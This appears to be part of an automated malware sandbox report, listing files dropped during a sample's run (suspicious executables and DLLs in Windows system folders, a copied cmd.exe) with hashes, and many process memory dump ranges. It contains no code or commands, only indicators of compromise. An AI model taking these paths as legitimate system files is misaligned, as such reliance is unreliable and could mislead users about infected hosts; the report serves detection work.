edf066968f31451e21c7c21d3f54b03fd5827a8526940c1e449aad7f99624577cbc6432deba49bb86e96ac275f5900dcef8d7623855eb3c808e084601ee1df20

Download Submit
C:\Windows\SysWOW64\Bkofhk32.dll

Filesize
7KB

MD5
317ee5e36161cc93818ceb2259bd6bb9

SHA1
abe54cfdd4486c0ecc76056da0973502dcee1c99

SHA256
a8fecc9f0f5e91b7b28775c7f09edd077db69414685fe6e9d8671f7b710683fd

SHA512
ec13f7e767b8154200844557d972d6cfaf114e4b65020d232414eb3e9770b5b1e6efb1810c59519905085445f0d2df51afdb276ce872c40eeaaa39530bf7c48d

Download Submit
C:\Windows\SysWOW64\Klbldo32.exe

Filesize
192KB

MD5
33f5b1a55c2b3cdabac6cb1b0a2550ec

SHA1
71b99080149a9dc56c63dadc55218b3f23625616

SHA256
e21652734a29f1a79828ab6270847a28f75b8d492b7d537108338e781f09eaaa

SHA512
3469f3273cff04b70a031a6e69dcff4eda11c810c3ca0795902699c9a85fd9e5af752b85e81f88e902be147024463901f01c6e8811a581b82b44e9cdb4c08015

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\4576053A75C8E1F3EF58305A622D150B328341E7

Filesize
1KB

MD5
1ffd3f472d33704797e69f918a27a1d3

SHA1
b92d8dd09a25d72616e0cc6c2b690f2016d119bd

SHA256
f1d42fd43cb53a8d0db4dbff7b2e2cc643f426ce1c3330768cbf98fba2c98844

SHA512
e1e999312cbf3bc6795bf9a650ba29356a044527922aeefac062d2c3e2dbed99be46e49ab06875058411333845aea43c50543c91bb153e30f1d6ac577a24aadd

Download Submit
C:\Windows\sysnldcvmr.exe

Filesize
79KB

MD5
0c883b1d66afce606d9830f48d69d74b

SHA1
fe431fe73a4749722496f19b3b3ca0b629b50131

SHA256
d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

SHA512
c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

Download Submit
C:\cyb\temp\cmd.exe

Filesize
1.1MB

MD5
742ab5f4a773e9107229215a65a859d8

SHA1
1617d7b62397dc6b465dd3db29a10db9d17b8416

SHA256
33f72c942dc0378444c59fc027997fe620b7e918d6d8843b33f70458127d4360

SHA512
8295498c3a4460f21e447fadf684fa302eba81740f94d1c61f0e1908286f691c3ac9c357e9400bff231f746a6f54106fe96b86cf9ab4394dc35e0a36b185ad7b

Download Submit
memory/32-15-0x00007FFC55473000-0x00007FFC55475000-memory.dmp

Filesize
8KB

Download
memory/32-16-0x00000000006A0000-0x00000000006E2000-memory.dmp

Filesize
264KB

Download
memory/32-2954-0x000000001B5F0000-0x000000001B600000-memory.dmp

Filesize
64KB

Download
memory/32-3012-0x000000001B5F0000-0x000000001B600000-memory.dmp

Filesize
64KB

Download
memory/456-3225-0x0000000000150000-0x0000000000393000-memory.dmp

Filesize
2.3MB

Download
memory/456-3077-0x0000000000150000-0x0000000000393000-memory.dmp

Filesize
2.3MB

Download
memory/1736-3174-0x00000000070D0000-0x00000000070DA000-memory.dmp

Filesize
40KB

Download
memory/1736-3161-0x000000006D1D0000-0x000000006D21C000-memory.dmp

Filesize
304KB

Download
memory/1736-3120-0x0000000004FE0000-0x0000000005046000-memory.dmp

Filesize
408KB

Download
memory/1736-3171-0x0000000006D10000-0x0000000006DB4000-memory.dmp

Filesize
656KB

Download
memory/1736-3121-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/1736-3172-0x00000000076F0000-0x0000000007D6A000-memory.dmp

Filesize
6.5MB

Download
memory/1736-3173-0x0000000007070000-0x000000000708A000-memory.dmp

Filesize
104KB

Download
memory/1736-3111-0x0000000005090000-0x00000000056BA000-memory.dmp

Filesize
6.2MB

Download
memory/1736-3107-0x0000000002830000-0x0000000002866000-memory.dmp

Filesize
216KB

Download
memory/1736-3134-0x0000000005830000-0x0000000005B87000-memory.dmp

Filesize
3.3MB

Download
memory/1736-3170-0x0000000006CE0000-0x0000000006CFE000-memory.dmp

Filesize
120KB

Download
memory/1736-3199-0x0000000007390000-0x0000000007398000-memory.dmp

Filesize
32KB

Download
memory/1736-3146-0x0000000005D20000-0x0000000005D6C000-memory.dmp

Filesize
304KB

Download
memory/1736-3145-0x0000000005D00000-0x0000000005D1E000-memory.dmp

Filesize
120KB

Download
memory/1736-3183-0x00000000072E0000-0x0000000007376000-memory.dmp

Filesize
600KB

Download
memory/1736-3160-0x00000000062F0000-0x0000000006324000-memory.dmp

Filesize
208KB

Download
memory/1736-3119-0x0000000004EC0000-0x0000000004EE2000-memory.dmp

Filesize
136KB

Download
memory/1736-3184-0x0000000007270000-0x0000000007281000-memory.dmp

Filesize
68KB

Download
memory/1736-3190-0x00000000072A0000-0x00000000072AE000-memory.dmp

Filesize
56KB

Download
memory/1736-3194-0x00000000072B0000-0x00000000072C5000-memory.dmp

Filesize
84KB

Download
memory/1736-3195-0x00000000073A0000-0x00000000073BA000-memory.dmp

Filesize
104KB

Download
memory/1852-5824-0x0000000031720000-0x00000000324CA000-memory.dmp

Filesize
13.7MB

Download
memory/1852-5801-0x0000000031720000-0x00000000324CA000-memory.dmp

Filesize
13.7MB

Download
memory/2004-1518-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

Filesize
4KB

Download
memory/2004-1975-0x0000000074D50000-0x0000000075501000-memory.dmp

Filesize
7.7MB

Download
memory/2004-0-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

Filesize
4KB

Download
memory/2004-3-0x0000000074D50000-0x0000000075501000-memory.dmp

Filesize
7.7MB

Download
memory/2004-2-0x0000000005250000-0x00000000052EC000-memory.dmp

Filesize
624KB

Download
memory/2004-1-0x00000000007A0000-0x00000000007A8000-memory.dmp

Filesize
32KB

Download
memory/2032-5811-0x0000000000150000-0x000000000019A000-memory.dmp

Filesize
296KB

Download
memory/2380-4300-0x0000000006150000-0x00000000066F6000-memory.dmp

Filesize
5.6MB

Download
memory/2380-4296-0x0000000005780000-0x00000000057D8000-memory.dmp

Filesize
352KB

Download
memory/2380-4301-0x0000000005520000-0x0000000005574000-memory.dmp

Filesize
336KB

Download
memory/2380-3239-0x0000000000940000-0x0000000000B52000-memory.dmp

Filesize
2.1MB

Download
memory/2380-3259-0x0000000005610000-0x00000000056E6000-memory.dmp

Filesize
856KB

Download
memory/2644-5500-0x0000000005860000-0x00000000058F2000-memory.dmp

Filesize
584KB

Download
memory/2644-5523-0x00000000074B0000-0x00000000074C2000-memory.dmp

Filesize
72KB

Download
memory/2644-5525-0x0000000007550000-0x000000000759C000-memory.dmp

Filesize
304KB

Download
memory/2644-5493-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/2644-5524-0x0000000007510000-0x000000000754C000-memory.dmp

Filesize
240KB

Download
memory/2644-5501-0x0000000005830000-0x000000000583A000-memory.dmp

Filesize
40KB

Download
memory/2644-5517-0x00000000064A0000-0x0000000006516000-memory.dmp

Filesize
472KB

Download
memory/2644-5518-0x0000000006C10000-0x0000000006C2E000-memory.dmp

Filesize
120KB

Download
memory/2644-5521-0x00000000075A0000-0x0000000007BB8000-memory.dmp

Filesize
6.1MB

Download
memory/2644-5522-0x0000000008D60000-0x0000000008E6A000-memory.dmp

Filesize
1.0MB

Download
memory/2752-28-0x00000000006C0000-0x000000000081E000-memory.dmp

Filesize
1.4MB

Download
memory/3920-5489-0x0000000000D20000-0x0000000000D74000-memory.dmp

Filesize
336KB

Download
memory/4116-5750-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/4116-5631-0x0000000000400000-0x0000000000643000-memory.dmp

Filesize
2.3MB

Download
memory/4380-59-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-71-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-35-0x0000000000700000-0x00000000007DA000-memory.dmp

Filesize
872KB

Download
memory/4380-37-0x0000000004E90000-0x0000000004F9E000-memory.dmp

Filesize
1.1MB

Download
memory/4380-39-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-61-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-99-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-95-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-93-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-91-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-89-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-85-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-83-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-97-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-81-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-87-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-79-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-77-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-75-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-67-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-65-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-63-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-58-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-55-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-53-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-51-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-49-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-47-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-45-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-43-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-73-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-69-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-38-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-41-0x0000000004E90000-0x0000000004F99000-memory.dmp

Filesize
1.0MB

Download
memory/4380-2911-0x0000000005010000-0x00000000050AE000-memory.dmp

Filesize
632KB

Download
memory/4380-2912-0x00000000050B0000-0x00000000050FC000-memory.dmp

Filesize
304KB

Download
memory/4636-2288-0x000001A9A1160000-0x000001A9A1182000-memory.dmp

Filesize
136KB

Download
memory/4636-5448-0x00007FF7E7650000-0x00007FF7E7885000-memory.dmp

Filesize
2.2MB

Download
memory/4636-5451-0x00007FF7E7650000-0x00007FF7E7885000-memory.dmp

Filesize
2.2MB

Download
memory/5332-6914-0x0000000005990000-0x00000000059E4000-memory.dmp

Filesize
336KB

Download
memory/5576-4323-0x0000000000E00000-0x0000000000E06000-memory.dmp

Filesize
24KB

Download
memory/6064-5550-0x0000000005680000-0x00000000059D7000-memory.dmp

Filesize
3.3MB

Download
memory/6064-5563-0x000000006A080000-0x000000006A0CC000-memory.dmp

Filesize
304KB

Download
memory/6064-5572-0x0000000006E80000-0x0000000006F24000-memory.dmp

Filesize
656KB

Download
memory/6064-5573-0x0000000007130000-0x0000000007141000-memory.dmp

Filesize
68KB

Download
memory/6064-5597-0x0000000007170000-0x0000000007185000-memory.dmp

Filesize
84KB

Download
memory/12380-14255-0x0000000006190000-0x00000000061E4000-memory.dmp

Filesize
336KB

Download
memory/15188-14297-0x0000000007C30000-0x0000000007C38000-memory.dmp

Filesize
32KB

Download
memory/15188-14194-0x0000000000320000-0x0000000000A4A000-memory.dmp

Filesize
7.2MB

Download
memory/15188-14377-0x0000000007C80000-0x0000000007C8E000-memory.dmp

Filesize
56KB

Download
memory/15188-14376-0x0000000007D10000-0x0000000007D48000-memory.dmp

Filesize
224KB

Download
memory/15308-15614-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/17620-15604-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/17696-15574-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/17832-15555-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/17864-16152-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/17868-15278-0x0000000000E80000-0x0000000000ED2000-memory.dmp

Filesize
328KB

Download
memory/17920-15504-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18060-15587-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18068-15516-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18388-15543-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18488-16153-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18504-15624-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18628-15639-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18700-15653-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18796-15671-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18860-15679-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18932-15688-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18980-15694-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/18992-15695-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/19076-15701-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/19132-16149-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/19252-16150-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/19356-16151-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download